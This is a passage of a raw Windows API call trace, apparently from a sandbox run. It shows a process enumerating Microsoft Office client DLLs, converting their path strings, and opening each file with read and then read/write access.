(HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d3c8 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d3c8 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0099.714] AreFileApisANSI () returned 1 [0099.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0099.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll") returned 80 [0099.714] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-core-xstate-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0c26cd1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0c26cd1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0e62fac, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d60)) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0099.714] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0099.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.714] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.714] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd289cda7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd289cda7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2a1a592, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="AP5C76~1.DLL")) returned 1 [0099.714] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0099.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0099.715] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.715] AreFileApisANSI () returned 1 [0099.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 78 [0099.715] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.715] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.716] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.716] AreFileApisANSI () returned 1 [0099.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.716] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c7a0 [0099.716] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c7a0, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 78 [0099.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.716] GetFileType (hFile=0x27c) returned 0x1 [0099.716] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0099.716] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.716] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.717] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.717] CloseHandle (hObject=0x27c) returned 1 [0099.717] AreFileApisANSI () returned 1 [0099.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8cae8 [0099.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8cae8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 78 [0099.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.717] GetFileType (hFile=0x27c) returned 0x1 [0099.717] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0099.717] CloseHandle (hObject=0x27c) returned 1 [0099.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.717] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0099.718] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.718] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.718] AreFileApisANSI () returned 1 [0099.718] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c6f8 [0099.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x8c6f8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll") returned 78 [0099.719] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-conio-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd289cda7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd289cda7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd2a1a592, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4cc0)) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.719] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.719] FindNextFileW (in: hFindFile=0x786d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd0b8e391, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd0b8e391, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd0d7e20c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e308 | out: hHeap=0x20000) returned 1 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.719] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0099.719] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cd88 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cd88 | out: hHeap=0x20000) returned 1 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0099.720] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0099.720] AreFileApisANSI () returned 1 [0099.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 80 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0099.720] AreFileApisANSI () returned 1 [0099.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.720] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c458 [0099.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll") returned 80 [0099.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.721] GetFileType (hFile=0x27c) returned 0x1 [0099.721] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0099.721] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.722] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.722] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.722] CloseHandle (hObject=0x27c) returned 1 [0099.722] AreFileApisANSI () returned 1 [0099.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0099.722] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0099.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d0b0, cbMultiByte=-1, lpWideCharStr=0x8ca40, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll") returned 80 [0099.722] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0099.722] GetFileType (hFile=0x27c) returned 0x1 [0099.722] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0099.722] CloseHandle (hObject=0x27c) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.723] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.723] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: 